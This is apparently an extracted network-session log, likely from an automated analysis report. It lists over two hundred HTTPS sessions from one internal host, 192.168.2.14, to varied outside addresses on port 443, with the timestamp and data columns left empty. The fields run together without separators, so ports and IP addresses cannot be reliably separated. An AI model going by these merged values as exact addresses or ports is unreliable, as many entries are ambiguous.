                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19968192.168.2.1435886137.233.5.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19969192.168.2.1436620181.155.26.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19970192.168.2.1442442218.201.201.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19971192.168.2.145276247.216.124.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19972192.168.2.145820875.82.95.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19973192.168.2.145470475.112.148.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19974192.168.2.145306077.46.131.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19975192.168.2.1456732209.132.250.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19976192.168.2.1439724223.168.25.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19977192.168.2.1436318176.228.163.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19978192.168.2.14345242.79.17.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19979192.168.2.1437302157.93.227.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19980192.168.2.1439756178.95.46.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19981192.168.2.14521068.146.64.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19982192.168.2.1454628135.2.253.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19983192.168.2.1455418219.212.137.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19984192.168.2.1445226136.187.119.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19985192.168.2.1437734108.199.46.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19986192.168.2.1439612122.140.166.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19987192.168.2.1459666188.4.199.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19988192.168.2.1451864108.155.2.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19989192.168.2.143509635.177.197.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19990192.168.2.143779844.104.181.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19991192.168.2.144673654.58.98.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19992192.168.2.143563832.221.144.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19993192.168.2.143412817.232.52.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19994192.168.2.1436372109.145.47.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19995192.168.2.14411785.218.134.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19996192.168.2.144796217.180.175.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19997192.168.2.1450852167.14.189.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19998192.168.2.1433092193.190.51.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19999192.168.2.1450982141.96.229.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20000192.168.2.144796292.222.44.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20001192.168.2.145712683.140.47.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20002192.168.2.143490071.220.40.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20003192.168.2.1446394189.67.244.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20004192.168.2.145310486.166.204.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20005192.168.2.1439284200.59.5.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20006192.168.2.1446948199.87.38.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20007192.168.2.144059497.169.180.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20008192.168.2.144229227.240.25.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20009192.168.2.1438414162.156.234.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20010192.168.2.1439800198.122.233.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20011192.168.2.145394690.212.240.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20012192.168.2.144117631.171.8.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20013192.168.2.144256037.240.207.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20014192.168.2.144193080.219.103.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20015192.168.2.1449348201.80.106.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20016192.168.2.145903279.172.122.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20017192.168.2.144309065.35.101.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20018192.168.2.143453237.129.105.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20019192.168.2.144753241.228.253.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20020192.168.2.1444754187.24.64.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20021192.168.2.1441802180.64.60.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20022192.168.2.1434716150.129.45.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20023192.168.2.1457476103.159.15.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20024192.168.2.145294472.0.88.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20025192.168.2.144487643.58.221.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20026192.168.2.144876088.32.173.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20027192.168.2.1459110195.130.159.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20028192.168.2.146062478.173.162.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20029192.168.2.1440766216.246.150.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20030192.168.2.143668018.164.160.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20031192.168.2.1455070121.240.147.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20032192.168.2.1437206103.142.250.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20033192.168.2.1455056128.175.61.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20034192.168.2.1454978133.37.178.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20035192.168.2.144667896.16.144.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20036192.168.2.1443856129.91.112.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20037192.168.2.144281872.229.145.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20038192.168.2.144035475.225.214.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20039192.168.2.145988259.95.114.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20040192.168.2.144991017.34.96.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20041192.168.2.1441230221.108.38.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20042192.168.2.1454034171.201.81.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20043192.168.2.145962688.9.58.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20044192.168.2.1446590223.12.229.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20045192.168.2.145125017.91.107.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20046192.168.2.144554453.161.83.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20047192.168.2.1451978222.19.191.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20048192.168.2.1444540115.5.210.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20049192.168.2.1433198193.17.204.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20050192.168.2.143791452.234.205.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20051192.168.2.1458302168.145.228.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20052192.168.2.1451738170.190.61.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20053192.168.2.1451682219.231.148.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20054192.168.2.1456718144.62.106.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20055192.168.2.1433658201.227.125.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20056192.168.2.1449026130.179.169.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20057192.168.2.1452268199.193.172.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20058192.168.2.144166881.200.91.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20059192.168.2.1440490204.28.52.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20060192.168.2.1445740212.179.129.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20061192.168.2.1454390220.62.105.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20062192.168.2.144197091.109.108.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20063192.168.2.144558024.71.255.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20064192.168.2.1445736205.67.93.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20065192.168.2.1436450149.157.116.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20066192.168.2.145223283.245.149.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20067192.168.2.1455010119.109.193.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20068192.168.2.1446874116.169.152.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20069192.168.2.1450648181.144.159.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20070192.168.2.1458016183.145.191.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20071192.168.2.1450508186.196.125.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20072192.168.2.1451398101.205.208.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20073192.168.2.1440514135.11.70.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20074192.168.2.1454768207.65.158.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20075192.168.2.1442370170.44.61.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20076192.168.2.1450498195.68.127.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20077192.168.2.1446726179.255.83.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20078192.168.2.14394302.88.36.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20079192.168.2.1454312190.66.165.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20080192.168.2.1433166169.210.0.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20081192.168.2.1438592100.180.166.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20082192.168.2.1455468151.147.254.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20083192.168.2.143935041.80.197.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20084192.168.2.1443780183.89.129.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20085192.168.2.1435368176.146.94.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20086192.168.2.1437218220.25.236.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20087192.168.2.1448626206.230.216.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20088192.168.2.144161251.198.28.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20089192.168.2.1439392160.54.29.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20090192.168.2.144815067.70.87.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20091192.168.2.1433522158.147.217.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20092192.168.2.145323098.57.107.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20093192.168.2.1460846163.25.143.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20094192.168.2.1460564136.75.62.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20095192.168.2.144562684.206.204.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20096192.168.2.1433624137.35.93.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20097192.168.2.1459304160.97.163.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20098192.168.2.145827475.221.239.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20099192.168.2.1441838115.115.133.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20100192.168.2.143461289.63.13.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20101192.168.2.1449364137.6.172.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20102192.168.2.143405663.223.149.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20103192.168.2.1454548120.247.197.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20104192.168.2.143278654.150.122.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20105192.168.2.1437630162.43.120.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20106192.168.2.1434658203.112.19.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20107192.168.2.1442108193.67.118.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20108192.168.2.1448616111.176.94.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20109192.168.2.144225857.88.181.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20110192.168.2.1453182198.56.106.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20111192.168.2.1455380222.93.157.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20112192.168.2.144149414.11.122.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20113192.168.2.1448584105.183.185.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20114192.168.2.1440278168.144.45.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20115192.168.2.1441674120.37.208.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20116192.168.2.1460792100.153.249.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20117192.168.2.1444676170.45.110.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20118192.168.2.143924668.55.101.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20119192.168.2.1449994126.153.215.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20120192.168.2.1433482220.214.58.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20121192.168.2.1438494195.30.215.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20122192.168.2.1432774191.161.38.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20123192.168.2.144419047.150.121.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20124192.168.2.1446060174.170.97.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20125192.168.2.145155281.17.190.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20126192.168.2.144567078.45.8.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20127192.168.2.1435910109.63.52.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20128192.168.2.145267489.5.113.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20129192.168.2.143963275.17.146.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20130192.168.2.143510853.240.187.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20131192.168.2.1434626126.77.183.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20132192.168.2.1460340170.198.202.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20133192.168.2.145797676.9.200.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20134192.168.2.145133679.63.31.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20135192.168.2.1447628145.36.113.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20136192.168.2.1442360104.54.252.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20137192.168.2.144880649.214.107.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20138192.168.2.1459858156.114.185.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20139192.168.2.144128614.67.247.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20140192.168.2.144180686.171.116.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20141192.168.2.143986279.86.94.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20142192.168.2.1444304185.222.143.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20143192.168.2.1460800152.10.68.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20144192.168.2.145623254.181.16.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20145192.168.2.1441402110.225.95.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20146192.168.2.1433058213.222.164.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20147192.168.2.1437598150.29.46.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20148192.168.2.1458838209.22.73.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20149192.168.2.1449610193.177.57.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20150192.168.2.1444624164.83.24.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20151192.168.2.144686414.137.139.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20152192.168.2.1435242190.146.157.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20153192.168.2.145914677.128.250.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20154192.168.2.143403897.151.3.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20155192.168.2.14429349.165.84.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20156192.168.2.1454704139.100.19.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20157192.168.2.1436142157.172.101.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20158192.168.2.1449706148.54.15.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20159192.168.2.1457328210.87.21.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20160192.168.2.143585091.122.46.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20161192.168.2.1436576141.119.104.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20162192.168.2.145724017.100.76.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20163192.168.2.144028085.138.131.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20164192.168.2.1441894109.130.113.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20165192.168.2.145863481.26.218.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20166192.168.2.143848819.49.49.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20167192.168.2.1450008170.124.93.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20168192.168.2.1457934218.46.42.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20169192.168.2.1433050173.246.115.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20170192.168.2.1457832129.163.255.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20171192.168.2.145876085.140.82.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20172192.168.2.1447938164.203.14.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20173192.168.2.1451958128.3.210.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20174192.168.2.1433046167.218.92.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20175192.168.2.1455792112.230.79.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20176192.168.2.1444878130.235.105.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20177192.168.2.1453232180.249.174.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20178192.168.2.1453484210.202.50.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20179192.168.2.143538096.176.90.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20180192.168.2.143725242.68.230.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20181192.168.2.1453536165.126.236.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20182192.168.2.144797898.65.214.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20183192.168.2.1448264211.203.77.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20184192.168.2.144797863.222.6.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20185192.168.2.1433358223.94.145.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20186192.168.2.1450410102.2.72.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20187192.168.2.1442668166.168.21.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20188192.168.2.144942440.79.195.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20189192.168.2.145407485.176.8.97443
